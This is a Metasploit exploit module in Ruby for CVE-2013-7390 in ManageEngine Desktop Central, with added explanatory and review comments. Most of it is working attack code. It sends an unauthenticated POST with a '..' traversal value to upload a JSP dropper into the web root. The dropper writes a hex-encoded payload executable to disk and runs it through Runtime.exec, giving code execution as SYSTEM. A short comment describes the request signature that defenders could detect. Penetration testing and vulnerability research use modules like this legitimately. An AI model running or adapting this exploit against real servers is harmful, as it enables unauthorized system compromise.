Path: blob/master/modules/exploits/windows/http/desktopcentral_file_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2013-7390: an unauthenticated arbitrary file upload in
# ManageEngine Desktop Central (the single target covers v7 through v8 build
# 80292). Requests go over HTTP (HttpClient mixin); the payload is delivered as
# a JSP page that writes a native executable to disk and runs it (EXE mixin);
# FileDropper records the dropped files so they are removed on session close.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata. One target is registered (index 0) and the default HTTP
  # port is overridden to 8020, the port the module expects Desktop Central on.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
      'Description' => %q{
        This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
        v8 build 80293. A malicious user can upload a JSP file into the web root without
        authentication, leading to arbitrary code execution as SYSTEM.
      },
      'Author' =>
        [
          'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2013-7390'],
          ['OSVDB', '100008'],
          ['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],
          ['URL', 'https://seclists.org/fulldisclosure/2013/Nov/130'],
        ],
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'Targets' =>
        [
          [ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
        ],
      'Privileged' => true,
      'DefaultTarget' => 0,
      'DisclosureDate' => '2013-11-11'
    ))

    register_options([Opt::RPORT(8020)])
  end

  # Sends `contents` as the POST body to the agentLogUploader endpoint. The
  # destination of the written file is taken entirely from query parameters;
  # `customerId` is set to '..' so the file is placed outside the per-customer
  # log directory (the cleanup path registered in #exploit shows it resolving
  # under webapps\DesktopCentral). `encode_params` is disabled so the '..'
  # value is sent literally.
  #
  # Returns true only on an HTTP 200 with an empty body; a missing response,
  # any other status, or a non-empty body is reported as failure.
  #
  # Detection note: an agentLogUploader request whose customerId contains '..'
  # or whose filename ends in .jsp is the observable signature of this
  # technique and is worth alerting on at the web tier.
  def upload_file(filename, contents)
    res = send_request_cgi({
      'uri' => normalize_uri('agentLogUploader'),
      'method' => 'POST',
      'data' => contents,
      'ctype' => 'text/html',
      'encode_params' => false,
      'vars_get' => {
        'computerName' => 'DesktopCentral',
        'domainName' => 'webapps',
        'customerId' => '..',
        'filename' => filename
      }
    })

    if res && res.code == 200 && res.body.to_s.empty?
      return true
    else
      return false
    end
  end

  # Test for Desktop Central
  #
  # Version check: fetches configurations.do and fingerprints the product from
  # the response body. For v8 (and later) the build number is read from the
  # buildNum hidden input and compared with 80293, the first build the
  # description treats as fixed; older builds report Appears, newer ones Safe.
  # Anything that yields no build number (including a non-200 response)
  # reports Unknown.
  #
  # NOTE(review): the v7 branch prints a detection message but never assigns
  # `build`, so a v7 host falls through to CheckCode::Unknown even though the
  # description lists v7 as affected. Confirm whether that is intended before
  # relying on check results for v7 installations.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri("configurations.do"),
      'method' => 'GET'
    })

    if res && res.code == 200
      build = nil

      if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
          res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7

        print_status("Detected Desktop Central v7")
      elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
          res.body.to_s =~ /ManageEngine Desktop Central MSP 8/

        if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
          build = $1
          print_status("Detected Desktop Central v8 #{build}")
        else # DC v8 (earlier versions)
          print_status("Detected Desktop Central v8")
        end
      elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
        build = $1
      end

      if build.nil?
        return Exploit::CheckCode::Unknown
      elsif Rex::Version.new(build) < Rex::Version.new("80293")
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
    end

    Exploit::CheckCode::Unknown
  end

  # Main flow: build the payload executable, wrap it in a JSP that writes and
  # runs it, upload the JSP, then request the JSP by name to trigger it.
  # Both dropped files are registered for cleanup; the JSP is registered by
  # the traversal-relative path under which the upload handler stored it.
  # An upload that does not return 200 with an empty body aborts the run with
  # Failure::Unknown. The final GET's response is not inspected.
  def exploit
    print_status("Uploading JSP to execute the payload")

    # Random 8-letter names avoid colliding with existing files and with
    # earlier runs against the same host.
    exe = payload.encoded_exe
    exe_filename = rand_text_alpha_lower(8) + ".exe"

    dropper = jsp_drop_and_execute(exe, exe_filename)
    dropper_filename = rand_text_alpha_lower(8) + ".jsp"

    if upload_file(dropper_filename, dropper)
      register_files_for_cleanup(exe_filename)
      register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    print_status("Executing payload")
    send_request_cgi(
      {
        'uri' => normalize_uri(dropper_filename),
        'method' => 'GET'
      })
  end

  # Returns JSP source that carries `bin_data` as a hex string literal, decodes
  # it two characters per byte on the server, and writes the result to
  # `output_file` with a FileOutputStream. The path is interpolated verbatim,
  # so it is written relative to the server process's working directory
  # unless an absolute path is supplied.
  def jsp_drop_bin(bin_data, output_file)
    jspraw = %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q| comb <<= 4;\n|
    jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns JSP source that runs `command` through Runtime.exec. The string is
  # interpolated directly into the scriptlet, so it must not contain characters
  # that would break the Java string literal.
  def jsp_execute_command(command)
    jspraw = %Q|\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Concatenates the two scriptlets: first the page that writes `bin_data` to
  # `output_file`, then the page that executes that same path.
  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end
end